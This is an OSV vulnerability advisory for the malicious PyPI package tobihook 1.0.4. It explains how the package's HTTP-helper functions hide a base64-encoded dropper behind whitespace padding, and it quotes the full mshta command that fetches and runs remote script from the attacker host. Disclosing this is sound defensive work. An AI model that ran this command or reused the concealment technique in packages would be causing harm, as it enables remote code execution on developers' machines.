tobihook @1.0.4
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5995
Ecosystem
pypi
Summary
The package masquerades as an HTTP helper (functions named post/get/fetch, module comment '# request/__init__.py', and an unused requests dependency) but each of those functions base64-decodes the string 'cmd /c mshta https://quitlag.com' and launches it via subprocess.Popen with CREATE_NO_WINDOW on Windows. mshta.exe then fetches and executes attacker-controlled HTA/JavaScript from quitlag.com on the caller's machine with no visible window. The malicious code is concealed in tobihook/post.py behind roughly 400 lines of leading whitespace and base64 obfuscation, and the dropper is reachable from the package's documented top-level API (tobihook/__init__.py re-exports post). Any developer who installs tobihook and calls its advertised post()/get()/fetch() triggers remote code execution on a Windows host.
Source: amazon-inspector (2c093ec7049ebbe26ca860033bc1fd81ad98f4f586b66fc68170e1ff81ae90bb)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.